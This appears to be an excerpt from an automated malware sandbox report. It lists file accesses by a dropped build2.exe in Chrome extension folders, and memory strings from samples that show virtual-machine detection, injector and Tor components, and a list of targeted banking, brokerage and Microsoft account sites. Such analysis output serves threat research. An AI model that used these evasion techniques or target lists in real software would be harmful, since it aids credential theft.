Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: explorer.exe, 00000002.00000000.2111564853.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: explorer.exe, 00000002.00000000.2107696919.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: 958B.exe, 00000008.00000002.2608920540.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000008.00000003.2574152453.00000000006C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s\|%s%s\|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: main.isRunningInsideVMWare
Source: explorer.exe, 00000002.00000000.2108418621.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 2899.exe, 00000028.00000002.4504876808.000000000300E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmhgfsP
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: explorer.exe, 00000002.00000000.2108418621.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: aryvmcixn-SE-
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 958B.exe, 00000008.00000002.2608920540.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000008.00000003.2574152453.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000008.00000002.2608920540.0000000000668000.00000004.00000020.00020000.00000000.sdmp, yiueea.exe, 00000017.00000002.4500899818.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp, yiueea.exe, 00000017.00000002.4500899818.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4500855997.0000000000694000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4500855997.0000000000607000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4500853338.0000000000772000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4500853338.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AppLaunch.exe, 00000011.00000002.2885047500.0000000005749000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
